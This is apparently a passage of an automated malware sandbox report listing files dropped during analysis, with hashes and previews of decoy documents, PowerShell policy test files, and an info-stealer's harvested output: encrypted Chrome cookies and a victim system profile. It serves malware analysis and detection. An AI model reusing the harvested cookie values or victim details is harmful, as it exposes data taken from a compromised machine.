                                                                                                                                                                                                                                      Entropy (8bit):4.704346314649071
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                                                                                                                                                                                                                                      MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                                                                                                                                                                                                                                      SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                                                                                                                                                                                                                                      SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                                                                                                                                                                                                                                      SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_Files_\DUUDTUBZFW.xlsx

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1026
                                                                                                                                                                                                                                      Entropy (8bit):4.701195573484743
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
                                                                                                                                                                                                                                      MD5:2530C45A92F347020337052A8A7D7B00
                                                                                                                                                                                                                                      SHA1:7EB2D17587824A2ED8BA10D7C7B05E2180120498
                                                                                                                                                                                                                                      SHA-256:8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
                                                                                                                                                                                                                                      SHA-512:78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:DUUDTUBZFWQODSNPWYYAIDZFECIUBQYLVGHZRZFDGGWVZPGQSHTPZANMRMNDUZLXCVYYIRRTMYEOTHOFJLCKQKOCQKNMRKZTHKIIPBKXIKLDAZFJGRVUHMDDXAMADOCGROYYDTNZZUEROBUVEGQEAZOMYVDGVHXUWCBVRBLFLWITRUFMXJJLQTZTWLOSFUMQDKRZDXVRLBYBKLXGLTGADROPECYTRYJQJWZDWJQHGRYFIQLJDBJUFPEPZLWGXGGDQGOLJCVZAPHJZOSIZQHISQFRJJGEZIJEFACYWHJRHAADQBMDQFJAGFBEZNQNGWDHSAAXOAEHIEHTAEPMOFJSOCRPTEUZGGSVYGVNUAYJPFNXFSYEEMDNDGDUBNXUOHVEJQBDRGSCASTDANAAFPQYQEHHTAOTYKYJJYXDZMUTBXBCIFNYSYWNMYAEEUEIGDANIBIJWTMCMGVDPOCAVEJZDTVMKOQPOOOKMLFWWMOASXZUZVHWZKPBVANJIBBDPCEKXDPEFNTXPTFJRBFUPHQCKMDMMXQPDZLJPURSOLPQREZLEFYXCGNKSFQRMLKDMGSNURCWGNTDQUIOYBPNJAYWOVTXRGROGVHNGIEDBYKUHNRBBDKYQXANPQWPKEOHDUBNRSQPALMLJEQFMXCQMEOAKBRREEJTYCHGUEGBGPJLGWRCLYLAKRESHJPMPCUHRFXHVUIQCQZYDTCNRGWVTYBMIILXIIIOGMHAQBLHFXCLTIKGXWDVRGSSRDNCYOVCLTUUEWRIDEOSWWZKTQLGLSIFPVAFJDGWVZYJUOVTMGGZMWUYOQYCLDNLMKWCJBKOXTWTPCMMIEYMISQTQCKMPNWJVAXPFISOGTRIMGKBHKEJOEDYIGOBOPVFADMXZUZQZVMUDYSPUHDXFZMAVPGIHURQNBZXXDWPSHUEZEFABRCKBUQLCPYBNGKJCWBTBSWMABCFIYQJOHFJJEPNNMRWWMNLOTWSMOXCILCCNICPDFTO

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_Files_\GRXZDKKVDB.docx

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1026
                                                                                                                                                                                                                                      Entropy (8bit):4.697358951122591
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                                                                                                                                                                                                                                      MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                                                                                                                                                                                                                                      SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                                                                                                                                                                                                                                      SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
                                                                                                                                                                                                                                      SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_Files_\PALRGUCVEH.docx

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1026
                                                                                                                                                                                                                                      Entropy (8bit):4.696508269038202
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                                                                                                                                                                                                                                      MD5:0E9E92228B27AD7E7B4449467A529B0C
                                                                                                                                                                                                                                      SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                                                                                                                                                                                                                      SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                                                                                                                                                                                                                      SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_Files_\ZGGKNSUKOP.xlsx

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1026
                                                                                                                                                                                                                                      Entropy (8bit):4.6959554225029665
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
                                                                                                                                                                                                                                      MD5:DCABA2748DFEAEF0BFBC56FD9F79315C
                                                                                                                                                                                                                                      SHA1:B87FBA690A774893B22B9F611DFDCB5CDC520269
                                                                                                                                                                                                                                      SHA-256:86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
                                                                                                                                                                                                                                      SHA-512:65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0xxqvxcx.a0c.ps1

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bopvykdd.oof.psm1

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ir3hvxn4.n1i.psm1

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rvypm1z1.fpp.ps1

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\adobebQmh7W1i7Wir\Cookies\Chrome_Default.txt

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (369), with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):530
                                                                                                                                                                                                                                      Entropy (8bit):5.999391385907715
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12:copYxSlufq7gCx7Fbyr4rOSlTfJJADr6HDsZQZ7gC6:KauS79Gr4iSllJALQZ7c
                                                                                                                                                                                                                                      MD5:06ED2CD304730F55A5C7001509E128BE
                                                                                                                                                                                                                                      SHA1:49651485B2CE3D239172BD52BF5A265AB3EB8E18
                                                                                                                                                                                                                                      SHA-256:66851B5AA77B3DEE71B842F53D4E30F664F5A08F9754B9E87B323871981516A4
                                                                                                                                                                                                                                      SHA-512:0163A8537DE695D34865EEB9C872F15A1827644D8797344A2D36E776F174E5901E77AA560488B0D7D7359B3648614F818B85A7D51F59CCDF2831B5715F5A9334
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:.google.com.FALSE./.TRUE.1699018815.1P_JAR.ENC893*_djEwmUj/dRHWNmfhbTB/w+u3HcpAF49UGcxvovgmz9ye9OQyJO9KCFHkRm8=_Spn23kok+Q5pGfoIFZdfhpScu2LLLElOWGEpK4fGivY=*...google.com.TRUE./.TRUE.1712238015.NID.ENC893*_djEwFCqquAx+Q1mLxpuZeEBJZSgzAt4Ngo/HHXcYPxMGINXG0MJzCe/y7m5VzpUyfsA6ingOdNobTvWP/YbKYpzg64nmGlCjRU9RpPIjDAuAxGlp5MTMUaOP4iC8aSCuijjqDE5gAdZQ5Jgb0/uEAZ4ssWGDsxXJbqpGbi04viYfPDhBfQ9XKXznqtHW/weYlNZJIGlKZBsCWoEIKfuL56VHKaBt04gLO/XK1/P3nHsp6pSc1x1uk1RRK7hSYUjCY5G/hcpBBjFv74dICDI=_Spn23kok+Q5pGfoIFZdfhpScu2LLLElOWGEpK4fGivY=*..

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\adobebQmh7W1i7Wir\information.txt

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):7441
                                                                                                                                                                                                                                      Entropy (8bit):5.368477939782725
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:xf8WZRS2c2KBhA6tsxODsG6v0K1U5PFmXkW+YbANUbg3x:xR82X6tsxPDt1oNm0W/4B
                                                                                                                                                                                                                                      MD5:BC77DAAE5AAB8981DB1DB85E55DEBB7B
                                                                                                                                                                                                                                      SHA1:7E62FA700530FD13FB37FCEF69637CD76DC8AD93
                                                                                                                                                                                                                                      SHA-256:80DC1759862878294C65192F3FBD0A0F03303D910D53332810140CC3731CE4EB
                                                                                                                                                                                                                                      SHA-512:68D6D14FEF0815BB73CFBC39531551675AACCDAADB82FF4E6EED0EE4D059A6EF6BD84D0108771A60B86510D3E000B3AE4713A661BC0C9DE61F08F1C39118FE1B
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:Build: bladak..Version: 1.9....Date: Fri Apr 19 03:29:31 2024.MachineID: 9e146be9-c76a-4720-bcdb-53011b87bd06..GUID: {a33c7340-61ca-11ee-8c18-806e6f6e6963}..HWID: cfeb70a35b65616976a5684cd81effed....Path: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe..Work Dir: C:\Users\user\AppData\Local\Temp\adobebQmh7W1i7Wir....IP: 81.181.57.52..Location: US, Atlanta..ZIP (Autofills): -..Windows: Windows 10 Pro [x64]..Computer Name: 899552 [WORKGROUP]..User Name: user..Display Resolution: 1280x1024..Display Language: en-CH..Keyboard Languages: English (United Kingdom) / English (United Kingdom)..Local Time: 19/4/2024 3:29:31..TimeZone: UTC1....[Hardware]..Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..CPU Count: 4..RAM: 8191 MB..VideoCard #0: Microsoft Basic Display Adapter....[Processes]..System [4]..Registry [92]..smss.exe [332]..csrss.exe [420]..wininit.exe [496]..csrss.exe [504]..winlogon.exe [564]..services.exe [632]..lsass.exe [640]..svchost.exe [752]..fontdrvhost.exe [7

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\adobebQmh7W1i7Wir\passwords.txt

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with CRLF, LF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):4897
                                                                                                                                                                                                                                      Entropy (8bit):2.518316437186352
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:4MMMMMMMMMMdMMMM1MMMMMMMM1MMMMMMMM1MMMMMMMM1MMMMMMMMMMdMMMMMMMM3:q
                                                                                                                                                                                                                                      MD5:B3E9D0E1B8207AA74CB8812BAAF52EAE
                                                                                                                                                                                                                                      SHA1:A2DCE0FB6B0BBC955A1E72EF3D87CADCC6E3CC6B
                                                                                                                                                                                                                                      SHA-256:4993311FC913771ACB526BB5EF73682EDA69CD31AC14D25502E7BDA578FFA37C
                                                                                                                                                                                                                                      SHA-512:B17ADF4AA80CADC581A09C72800DA22F62E5FB32953123F2C513D2E88753C430CC996E82AAE7190C8CB3340FCF2D9E0D759D99D909D2461369275FBE5C68C27A
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\adobevqkoBMIvF7c3\Cookies\Chrome_Default.txt

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (369), with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):530
                                                                                                                                                                                                                                      Entropy (8bit):5.999391385907715
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12:copYxSlufq7gCx7Fbyr4rOSlTfJJADr6HDsZQZ7gC6:KauS79Gr4iSllJALQZ7c
                                                                                                                                                                                                                                      MD5:06ED2CD304730F55A5C7001509E128BE
                                                                                                                                                                                                                                      SHA1:49651485B2CE3D239172BD52BF5A265AB3EB8E18
                                                                                                                                                                                                                                      SHA-256:66851B5AA77B3DEE71B842F53D4E30F664F5A08F9754B9E87B323871981516A4
                                                                                                                                                                                                                                      SHA-512:0163A8537DE695D34865EEB9C872F15A1827644D8797344A2D36E776F174E5901E77AA560488B0D7D7359B3648614F818B85A7D51F59CCDF2831B5715F5A9334
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:.google.com.FALSE./.TRUE.1699018815.1P_JAR.ENC893*_djEwmUj/dRHWNmfhbTB/w+u3HcpAF49UGcxvovgmz9ye9OQyJO9KCFHkRm8=_Spn23kok+Q5pGfoIFZdfhpScu2LLLElOWGEpK4fGivY=*...google.com.TRUE./.TRUE.1712238015.NID.ENC893*_djEwFCqquAx+Q1mLxpuZeEBJZSgzAt4Ngo/HHXcYPxMGINXG0MJzCe/y7m5VzpUyfsA6ingOdNobTvWP/YbKYpzg64nmGlCjRU9RpPIjDAuAxGlp5MTMUaOP4iC8aSCuijjqDE5gAdZQ5Jgb0/uEAZ4ssWGDsxXJbqpGbi04viYfPDhBfQ9XKXznqtHW/weYlNZJIGlKZBsCWoEIKfuL56VHKaBt04gLO/XK1/P3nHsp6pSc1x1uk1RRK7hSYUjCY5G/hcpBBjFv74dICDI=_Spn23kok+Q5pGfoIFZdfhpScu2LLLElOWGEpK4fGivY=*..

